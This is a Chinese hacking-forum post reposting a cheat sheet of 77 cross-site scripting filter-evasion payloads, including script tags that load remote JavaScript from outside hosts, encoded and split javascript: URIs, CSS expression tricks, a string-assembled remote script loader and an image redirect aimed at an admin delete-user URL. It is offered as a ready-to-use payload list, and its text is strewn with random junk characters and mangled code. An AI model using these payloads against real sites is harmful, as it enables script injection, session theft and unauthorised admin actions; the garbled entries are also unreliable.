貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 q& b. `+ ]# ]7 M, V7 K
# q. M3 c- U8 \7 m
(1)普通的XSS JavaScript注入" i5 j4 W4 M% [& m1 d+ ^6 h) R" B! ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, q6 v- F# R* j: a4 \( o, v; _) ]9 ]5 @! e
(2)IMG标签XSS使用JavaScript命令
, I8 U/ ^( q1 O" a <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( h( [% J$ B6 s# |
0 h; Q7 g0 t1 x0 {0 z
(3)IMG标签无分号无引号/ d$ n; D, a# H# ?" x5 |! b
<IMG SRC=javascript:alert(‘XSS’)>
+ [* n( H& Z- F, |0 f9 `0 R
G% F2 m- M% ~$ C0 A (4)IMG标签大小写不敏感- H& K+ L: p$ P5 r3 p7 `, [
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! W* v! ]3 ]3 x* h
! o/ C4 X- p4 i! u1 z3 }+ t$ Z (5)HTML编码(必须有分号)3 [) i2 |, C s% Y$ R! \3 n
<IMG SRC=javascript:alert(“XSS”)>
& l' F4 H$ M2 K( x( P/ a% g! N5 i
' Q! q% v8 m/ X* b (6)修正缺陷IMG标签
; u3 n+ M1 l6 ?5 y5 G5 H) V <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 z, i# Y X# |5 x% [1 [" I9 N, {* z. o
(7)formCharCode标签(计算器)$ W: _& G5 Z" Y& k7 r3 w( z$ `7 ~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ |; Q3 l, c* A: B0 r+ c
! q. P* B+ \/ k- H# m (8)UTF-8的Unicode编码(计算器)
6 W9 t6 B6 n* ?4 f9 [ <IMG SRC=jav..省略..S')>! y+ T5 w0 S2 k" O( |9 I3 L% H
# h0 T4 O; E( S* d( |* ]/ |. b (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 M+ Q8 u% o X6 _ <IMG SRC=jav..省略..S')>
% g: j& \; K; n; [, T
: k, u+ a/ i0 U* ?1 q9 \* a; Y (10)十六进制编码也是没有分号(计算器)/ Y3 B9 ~- T+ w. r! g, b' W0 ^- l
<IMG SRC=java..省略..XSS')>
1 p* Z( B) t8 \3 f! r
) `& P, `5 K5 f" J (11)嵌入式标签,将Javascript分开2 D, | M/ r+ G+ F' X
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ h6 [0 W* `$ d$ o
S# ^4 T+ U8 r* ^: g (12)嵌入式编码标签,将Javascript分开
& n6 t: B) @# y- x4 C+ s1 Y <IMG SRC=”jav ascript:alert(‘XSS’);”>
) Y9 \6 {$ j6 u8 x. k0 f1 T7 e7 c# W6 P: {( |% g$ m
(13)嵌入式换行符
: x9 d4 b) L0 w& C, U1 s <IMG SRC=”jav ascript:alert(‘XSS’);”>0 X5 s0 d- L- e3 ]8 r& P2 s, r& e
& M% b9 N/ C. ~4 O
(14)嵌入式回车+ R* q. j& f# X7 m2 I2 Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 L8 l7 b% s4 H
) P/ Q- G/ N4 w! o
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 u1 t9 W6 {+ B$ i1 o3 ^. l1 g <IMG SRC=”javascript:alert(‘XSS‘)”>+ L( L7 m6 o. f, O: Z
& g7 U& i1 W- v4 n
(16)解决限制字符(要求同页面)/ V- o+ `2 q/ l: @& A6 Y
<script>z=’document.’</script>
$ b3 k, G* R% S( U# u: X <script>z=z+’write(“‘</script>
5 e G/ J0 }; a x/ A- ?: D <script>z=z+’<script’</script>
) B5 N, V2 B+ w x <script>z=z+’ src=ht’</script>6 s! _1 n/ J' M0 k. n$ X9 N
<script>z=z+’tp://ww’</script>7 p6 g" P% V( b' r) G# ~
<script>z=z+’w.shell’</script>
3 M2 \5 ]9 O9 N% w0 _6 C) R$ _9 t7 D( o <script>z=z+’.net/1.’</script># b) F9 Y& e1 S4 G5 i) _
<script>z=z+’js></sc’</script>
7 M& b' x' C3 a <script>z=z+’ript>”)’</script>
* L! x$ N; b2 C' o <script>eval_r(z)</script>7 M. D" ^ Z1 W: ^- X7 F$ {
* d- d( Z d( _7 L) m (17)空字符" X4 S D* c' E' e* d% t T
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" L; k7 T/ t8 x( s% s
! G+ j6 g# U& Z% n8 t (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 r9 o& H: O0 t: s perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% w% G- ~; q+ f8 K9 G7 J; c4 q3 y' e3 j8 A5 Z6 k; w! H
(19)Spaces和meta前的IMG标签: r/ ? R) a8 d+ d+ V
<IMG SRC=” � javascript:alert(‘XSS’);”>8 `% g( [: i% F3 K0 H5 W
: M3 ^6 n! V9 I y) }
(20)Non-alpha-non-digit XSS
8 m, F0 M% D# T8 b& { <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 r0 M& H; N0 t3 x/ l3 t8 a( c
2 ?1 X1 a9 E8 c
(21)Non-alpha-non-digit XSS to 25 e* F& N* d# X K% x S" y; a
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) [5 c) h D; N4 c8 ]- a: H9 z: n) \" X
(22)Non-alpha-non-digit XSS to 3
$ Z/ R7 U2 {$ ^1 M3 i6 h" Z# q, Y <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 U3 o% R2 G4 d6 o: f( C4 C' V& q& c
! l$ P3 F( [, |& ?
(23)双开括号( e% v' C- x4 J* f2 q, x
<<SCRIPT>alert(“XSS”);//<</SCRIPT>% w0 ?1 n) A. s7 b
# S" Q- g3 j r3 o* W8 s2 o* l
(24)无结束脚本标记(仅火狐等浏览器)
3 ]9 F2 j, _! _0 d J2 j% ]' | <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>9 x$ i: L! d+ N4 R
* u5 B2 X1 f, s) E (25)无结束脚本标记2
) q8 E" L7 b! u* B <SCRIPT SRC=//3w.org/XSS/xss.js>
0 f# j% T i5 w( X/ b8 x0 Y5 L/ `9 ^) t% [) s9 j k" v, _
(26)半开的HTML/JavaScript XSS
- r5 ~% Q f8 C b: u4 h# S) F9 R* H <IMG SRC=”javascript:alert(‘XSS’)”
+ m! T& I9 n: l$ u. M1 Y7 g$ c5 Q9 ?4 `* H
(27)双开角括号
9 d! b" T7 m: B) M! U <iframe src=http://3w.org/XSS.html <* i" M ~7 r R
! d+ v8 h! a. K) \9 k7 K$ i (28)无单引号 双引号 分号
6 N' a0 C% Z+ ?3 H <SCRIPT>a=/XSS/& u9 I4 s$ D( z
alert(a.source)</SCRIPT>
2 G6 a4 @1 O8 J* d) P4 u* V+ A
. \( `5 ^, V1 q/ e: C (29)换码过滤的JavaScript+ K9 `' i+ f0 @3 f2 I( g8 {
\”;alert(‘XSS’);//$ K- I2 o" |& s' s, Q
& L" {6 C; w9 g
(30)结束Title标签/ g6 A$ B1 y5 o4 v& Y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
4 A1 b$ K9 v! I: a" k/ ~; t- I
% F# p* P& ]& v! x2 `3 K7 H (31)Input Image u0 k7 |$ p! ]& g
<INPUT SRC=”javascript:alert(‘XSS’);”>- o+ p- R" ~5 k/ i
5 l) F6 l% A9 I( T# x3 m# Z3 a
(32)BODY Image! f5 d; { \7 f& g2 i
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' `% p) V6 {" @( @
' y- p5 [+ V) }6 I$ N8 I- }
(33)BODY标签0 y3 O7 H5 f2 B. E+ O4 U
<BODY(‘XSS’)>9 t/ I: U4 U {" t
2 k4 p. T4 z5 L6 m- h
(34)IMG Dynsrc {+ g5 b; U! ~% p6 L
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
, P- E* ?/ k& Q2 X
8 D& F6 {- @0 k8 |! J (35)IMG Lowsrc8 n: C' _, U. b2 a( {
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
; B" y5 j4 z# {& \: e# [4 l+ f# G8 h: T) Q4 R$ c$ c0 m0 z
(36)BGSOUND* y8 e& `$ s. ?
<BGSOUND SRC=”javascript:alert(‘XSS’);”>0 _6 {. n3 z1 m5 f! @$ \. E
* {7 j ~! n; `* m* A
(37)STYLE sheet8 i. N2 S. D# P& T) N) h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ a" i- k% {6 C1 O4 `9 u
8 K! b: e2 A$ ?7 p/ c& ?/ F
(38)远程样式表( K$ ^7 ~, z! n T- R0 {( M1 h
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ D- \8 W |- ]+ _1 ]! y4 F. |3 G
(39)List-style-image(列表式)
+ G; X5 }1 S q* W; B <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ [0 i3 N; l2 p6 k" }1 V. x0 N6 n0 g
(40)IMG VBscript6 h9 }. |! d: ?0 x2 R
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS+ k( D1 E. d2 V! Z# P5 Y
8 K8 B! _* F! u! K% z ?' g (41)META链接url
9 I0 s' q3 D/ y <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>! I2 K& ^: m9 K1 }5 |5 R
) L+ N# B& l6 {# M' B
(42)Iframe
2 Q5 ^: p% `% ?; C& c <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. M7 L3 p7 n6 A& V
6 Q. q1 m& j+ D0 O- u+ ~
(43)Frame
7 ]( U6 L& S* J9 P" V) g; ^; M <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 B* f! }; L& u( P2 h1 z: G5 u# g! |" g, b; X
(44)Table0 q- p, t6 b m+ p* W9 z
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 H- O2 _ g* W; _. K
; \, |# r1 o" Z7 ^2 i" j8 x9 Y
(45)TD. E( w9 l. E% l3 N8 y9 L
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) H; _( h( H1 d% z
% [$ M+ g" O6 J# c (46)DIV background-image9 s! l5 Q$ K$ O6 F0 J
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ {4 M; \# `0 E$ h
3 [7 R$ @; R* l) s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
\7 J: s3 a* [2 b" F* q2 f# I2 L <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>. d. a' y2 v" ^ f
6 z' N5 W9 [8 r& \1 q$ |
(48)DIV expression% p* q4 V4 e1 [5 k1 s+ f* `
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& o. H& C# Z" P8 w! h
4 a, |6 }+ Y% I/ y0 s+ F (49)STYLE属性分拆表达
5 R5 r" i# o0 i6 q <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>" N" d; r6 }9 a7 ~- _4 V0 r
: `+ [% y$ L: Z1 q3 Q
(50)匿名STYLE(组成:开角号和一个字母开头)$ w O" J" h; {# U* P
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" ]! u1 r& ^- h# \( b
6 u$ a0 t& i3 {8 ^( U' K" J
(51)STYLE background-image. N8 @) q$ K9 @3 z; v* b+ D
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* ~5 i) g) r& p
0 }/ o7 l U, I( `& D! ` (52)IMG STYLE方式, o0 c" J+ c# K
exppression(alert(“XSS”))’>+ w5 p' d- C1 }
( I, p+ s6 Z S" a P- R; `1 W/ x
(53)STYLE background' ^# J y, ~' N! x8 o8 o/ x
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" Y8 w4 b$ R2 e
, H8 n! {- x0 e& _, w; H3 A6 U7 S (54)BASE& ~- N3 w, } y
<BASE HREF=”javascript:alert(‘XSS’);//”># J b. B9 b) G' Y( ~6 o) d( Y) a
' {+ l) h, L; U. H$ \5 U
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: m7 ~0 t! F. s$ X
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 J6 `5 E& \' y
8 i5 Y6 F& D+ C; s/ ^3 Z. c (56)在flash中使用ActionScrpt可以混进你XSS的代码
. b+ Q. b5 S2 E( a4 R5 J- z9 v a=”get”;4 M5 B0 T) t' F% Q e, c6 d0 y4 i
b=”URL(\”";7 d4 l: }3 E0 O5 s+ G* L
c=”javascript:”;9 Q* R4 b6 @* V9 r9 e9 U ]
d=”alert(‘XSS’);\”)”;! |* U+ b0 R5 p I1 F
eval_r(a+b+c+d);
4 b& m$ W2 s( z, U4 `6 N. D9 G: ~; O3 C, k; r3 `
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 h- O/ ?. D3 ]% m0 A+ y7 @. x! y9 f <HTML xmlns:xss>
7 ]+ `+ B# Q( q5 P' o w8 T <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
1 C7 p/ O6 @9 n8 I <xss:xss>XSS</xss:xss>/ |! \) s1 W. K& ^% E2 d5 S* `% [
</HTML>0 {- u+ y) w# t1 [! P* {
7 O0 S8 r* x8 w+ o1 _2 p (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ c: p, G+ K2 w) |, t <SCRIPT SRC=””></SCRIPT>- b: L& [0 V! j# q: Q
% P3 i( ~9 n) b% N+ \, @ (59)IMG嵌入式命令,可执行任意命令2 o) N' i# }( i( V: e9 C
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 F, `8 \) X- j+ {( n+ r0 r R! `
" G' J- c3 l" d0 I/ F8 o8 j
(60)IMG嵌入式命令(a.jpg在同服务器)5 F, d- |# p5 W0 x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- S7 W, ]0 b% o
* K8 j7 K" p+ I* i: y+ _. y
(61)绕符号过滤8 Z( L" ~8 C' a8 `" O4 l
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! z% L7 R, \% v; r) j
7 ~, L8 J1 V: {# E- Q _' y6 ` (62)
, x/ Z3 {' o3 r# U. J) k5 M. Y8 ` <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 G6 H- P9 R f }5 J
, z& A; S$ P/ a% o/ Y (63)) Y4 |5 W0 x$ F1 }# ^( I/ B
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
( ?, Y$ o# q: S# \( u5 Y9 ?4 E2 Y7 U# A g* C! K) V
(64)
+ P2 ]) a, a, {( x1 r- G9 z, t <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
$ |, g, ?6 |) W- v0 W6 }( `$ l" i+ g; K. F
(65)2 H5 V* V9 w& o9 w3 r- {) I
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
- A# h4 e" ?3 v9 }; [
- O- r; N' Z0 W1 Z4 L5 p/ u+ i. g (66)' K% s" @; H$ _4 {! M+ e% r: Q" m
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% l, ?. t( W) `; y9 U3 G' O$ P1 L
(67): \1 |0 B d$ I
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
# y5 }, p1 T! t9 a! ^* ?0 U6 o/ r3 _! y/ B j8 ]- R
(68)URL绕行/ S& F4 O% H. `& q% V1 C# M' L
<A HREF=”http://127.0.0.1/”>XSS</A> J) V! a: Q! _6 R, {
7 o: e% c3 |9 P. g% s (69)URL编码; S$ T4 V; C) s4 x
<A HREF=”http://3w.org”>XSS</A>
9 u& A) h% {& F9 T5 K% ^% O
+ Q- [* P r) e, r3 o+ A, i- j+ _ (70)IP十进制
: }# _, W+ d7 u7 ? <A HREF=”http://3232235521″>XSS</A>3 B+ T+ @2 M. W4 q4 Q+ {* i5 n
6 ]* \8 c% U6 d9 I1 ^3 g, Z: \ (71)IP十六进制
+ o' E* [5 H% n: A' l, \ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: b6 Q* B) |0 a# k" @: Y# f' Y. d' Y4 g0 ?3 l( ]" Q6 c+ s7 C$ U
(72)IP八进制2 o% f( x! c& x# D+ p' ~3 Q( t. K
<A HREF=”http://0300.0250.0000.0001″>XSS</A>1 Z' A2 B7 q% C/ ?/ m# z
W) o+ r4 {. p( q5 c
(73)混合编码
: t. C3 {9 `0 R8 J <A HREF=”h+ b7 |% Z# j) g% d
tt p://6 6.000146.0×7.147/”">XSS</A>
( @% N/ V+ c. s" |( G+ ^1 ?4 \& u; S5 y- e% A- L# r! C; K/ k
(74)节省[http:]
9 D1 J8 \+ d R8 u/ J <A HREF=”//www.google.com/”>XSS</A>! W: o, m- r( n0 l0 n1 f
! F" w [: C6 Z
(75)节省[www]; _1 P3 }4 D& }! D, I" g: ^
<A HREF=”http://google.com/”>XSS</A>) g/ K5 F" k& D) d
# y( H$ ~( q b% ]! F (76)绝对点绝对DNS
2 {" D. ?" q) _" Q9 k, y8 M. e <A HREF=”http://www.google.com./”>XSS</A>
& k; {( M$ c h% i$ e0 N" Z( I+ }$ j5 k+ t
(77)javascript链接
4 Q* d" w+ Y) [/ ~0 e1 y; U <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对